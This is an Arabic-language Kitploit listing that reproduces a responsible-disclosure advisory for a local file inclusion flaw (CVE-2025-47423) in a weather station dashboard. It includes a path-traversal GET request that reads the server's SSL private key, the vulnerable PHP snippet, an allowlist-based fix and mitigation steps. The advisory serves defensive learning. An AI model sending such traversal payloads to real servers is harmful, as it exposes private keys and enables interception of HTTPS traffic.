Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-47423 — الإفصاح المفصل عن CVE-2025-47423: تضمين الملفات المحلية في لوحة إدارة محطة الطقس الشخصية 12_lts. يتضمن إثبات المفهوم (PoC)، تحليل الكود القابل للاستغلال، وتوصيات الإصلاح الآمن للتعلم الدفاعي. | Kitploit
أدوات/GitHubGitHub/haluka92/cve-2025-47423
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالأوراق والأبحاثالتعلم والتعليمموارد منسقة
GitHubhaluka92/cve-2025-47423

CVE-2025-47423

الإفصاح المفصل عن CVE-2025-47423: تضمين الملفات المحلية في لوحة إدارة محطة الطقس الشخصية 12_lts. يتضمن إثبات المفهوم (PoC)، تحليل الكود القابل للاستغلال، وتوصيات الإصلاح الآمن للتعلم الدفاعي.

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-47423 – تضمين الملفات المحلي في لوحة تحكم محطة الطقس الشخصية (12_lts)

اكتشفه: Matthew Eagle
الحالة: إفصاح عام
تاريخ الإبلاغ: 2025-05-05
معرف CVE: CVE-2025-47423


🧩 الملخص

ثغرة تضمين الملفات المحلي (LFI) في إصدار 12_lts من لوحة تحكم محطة الطقس الشخصية تسمح للمهاجمين غير الموثقين بقراءة ملفات عشوائية على الخادم. استغلال هذه الثغرة يمنح الوصول إلى ملفات حساسة بما في ذلك مفاتيح SSL الخاصة، مما قد يضر بسرية وسلامة اتصالات HTTPS.


🛠 المكون المتأثر

  • الملف: /others/_test.php
  • المعامل القابل للاستغلال: test (عبر GET)

📈 التأثير

تسمح هذه الثغرة للمهاجمين عن بعد بـ:

  • قراءة ملفات عشوائية على نظام الملفات
  • كشف مفاتيح SSL الخاصة (مثل server.key)
  • تنفيذ هجمات الوسيط (MITM)
  • انتحال هوية خادم HTTPS

CVSS: 5.8 متوسط


💥 إثبات المفهوم (PoC)

root@kitploit:~
GET /others/_test.php?test=../../../apache/conf/ssl.key/server.key HTTP/1.1
Host: www.example.com

الرد:

root@kitploit:~
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAs2omMqKSB+lm7xu9Nu3C5...
...TRUNCATED...
-----END RSA PRIVATE KEY-----

🧪 الكود القابل للاستغلال (مبسط)

root@kitploit:~
$script = trim($_GET['test']);
$script = str_replace('../','',$script);
include($script);

إن str_replace غير كافٍ لمنع اجتياز الدليل.


🔐 الإصلاح الآمن

  • استخدام قائمة السماح الصارمة لأهداف التضمين
  • تنظيف الإدخال باستخدام basename() والتحقق من الملفات المسموح بها
  • تجنب التضمين الديناميكي بناءً على إدخال المستخدم
root@kitploit:~
$allowed_tests = ['index.php', 'module_test.php'];
$script = isset($_GET['test']) ? basename($_GET['test']) : 'index.php';

if (!in_array($script, $allowed_tests)) {
    die("Invalid test file.");
}

include(__DIR__ . '/scripts/' . $script);

📅 الجدول الزمني

التاريخالحدث
2025-05-05تم الإبلاغ عن الثغرة لمشرفي PWS Dashboard
2025-05-06تم التأكيد وبدء الاختبارات
2025-05-07تم حجز CVE-2025-47423 عبر MITRE
قيد الانتظارالتصحيح العام وإدراج CVE معلق

🧠 التخفيف

إذا كنت تستخدم Personal Weather Station Dashboard 12_lts، فيجب عليك:

  • إزالة أو تحديث _test.php فورًا
  • تطبيق البرنامج النصي المعدل مع القائمة البيضاء للملفات
  • تدوير وإعادة إصدار أي شهادات TLS تم اختراقها

🧾 المراجع

  • CVE-2025-47423 على MITRE (معلق)
  • الإعلان المنشور على GitHub

🙏 الإشادة

تم اكتشاف الثغرة والإفصاح عنها بمسؤولية بواسطة Matthew Eagle
جهة الاتصال: [email protected]


تم تنسيق الإفصاح وفقًا لإرشادات الإفصاح المسؤول. تم إصدار هذا المستند لأغراض تعليمية ودفاعية.

تنزيل الأداة